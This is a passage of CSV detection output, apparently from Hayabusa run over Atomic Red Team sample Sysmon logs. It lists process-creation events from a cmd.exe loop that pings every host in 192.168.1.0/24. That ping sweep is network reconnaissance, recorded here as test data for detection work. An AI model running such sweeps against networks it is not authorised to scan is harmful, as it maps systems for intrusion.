747F3D96-D8F7-5D31-0000-0010EDD33300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:35.579 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.2 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2084 | PGUID: 747F3D96-D8F7-5D31-0000-0010E3D83300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:35.988 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.3 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D8F7-5D31-0000-0010A7E13300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:36.549 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.4 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4376 | PGUID: 747F3D96-D8F8-5D31-0000-00108FE43300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:37.034 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.5 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D8F9-5D31-0000-00108BE73300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:37.513 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.6 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D8F9-5D31-0000-001073EA3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:38.020 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.7 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D8FA-5D31-0000-00105BED3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:38.517 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.8 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 747F3D96-D8FA-5D31-0000-001043F03300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:39.028 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.9 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D8FB-5D31-0000-00108BF33300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:39.537 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.10 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 747F3D96-D8FB-5D31-0000-001073F63300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:40.027 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.11 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2412 | PGUID: 747F3D96-D8FC-5D31-0000-001070F93300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:40.431 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.12 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D8FC-5D31-0000-00105AFC3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:41.066 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.13 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D8FD-5D31-0000-0010650E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:41.408 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.14 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D8FD-5D31-0000-00104F113400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:41.894 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.15 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4588 | PGUID: 747F3D96-D8FD-5D31-0000-001039143400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:42.466 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.16 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D8FE-5D31-0000-001023173400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:43.036 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.17 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D8FF-5D31-0000-00100E1A3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:43.503 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.18 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D8FF-5D31-0000-0010C5203400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:44.030 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.19 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D900-5D31-0000-0010B0233400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:44.507 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.20 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2416 | PGUID: 747F3D96-D900-5D31-0000-00109C263400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:45.011 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.21 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4104 | PGUID: 747F3D96-D901-5D31-0000-001086293400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:45.501 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.22 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5112 | PGUID: 747F3D96-D901-5D31-0000-0010712C3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:46.007 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.23 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D902-5D31-0000-00105B2F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:46.500 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.24 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4700 | PGUID: 747F3D96-D902-5D31-0000-0010B2393400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:47.022 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.25 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6104 | PGUID: 747F3D96-D903-5D31-0000-00109D3C3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:47.546 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.26 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D903-5D31-0000-0010873F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:48.044 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.27 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1492 | PGUID: 747F3D96-D904-5D31-0000-001084423400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:48.507 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.28 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1316 | PGUID: 747F3D96-D904-5D31-0000-00106E453400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:49.010 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.29 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5640 | PGUID: 747F3D96-D905-5D31-0000-001058483400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:49.550 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.30 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2928 | PGUID: 747F3D96-D905-5D31-0000-0010554B3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:50.021 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.31 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1952 | PGUID: 747F3D96-D906-5D31-0000-00103F4E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:50.507 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.32 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D906-5D31-0000-001029513400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:51.013 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.33 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1992 | PGUID: 747F3D96-D907-5D31-0000-001013543400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:51.520 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.34 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4788 | PGUID: 747F3D96-D907-5D31-0000-0010DA5C3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:52.008 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.35 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3212 | PGUID: 747F3D96-D908-5D31-0000-0010C45F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:52.448 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.36 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2552 | PGUID: 747F3D96-D908-5D31-0000-0010B2623400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:53.019 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.37 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2932 | PGUID: 747F3D96-D909-5D31-0000-00109E653400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:53.546 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.38 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6616 | PGUID: 747F3D96-D909-5D31-0000-001088683400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:54.036 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.39 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4312 | PGUID: 747F3D96-D90A-5D31-0000-0010726B3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:54.581 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.40 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D90A-5D31-0000-00105C6E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:55.015 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.41 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 796 | PGUID: 747F3D96-D90B-5D31-0000-001046713400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:55.552 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.42 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D90B-5D31-0000-001031743400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:56.049 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.43 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D90C-5D31-0000-00102E773400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:56.534 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.44 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1360 | PGUID: 747F3D96-D90C-5D31-0000-0010F37F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:57.034 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.45 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5060 | PGUID: 747F3D96-D90D-5D31-0000-0010DD823400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:57.558 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.46 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4708 | PGUID: 747F3D96-D90D-5D31-0000-0010D6853400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:58.020 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.47 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4624 | PGUID: 747F3D96-D90E-5D31-0000-0010D4883400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:58.457 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.48 | Process: 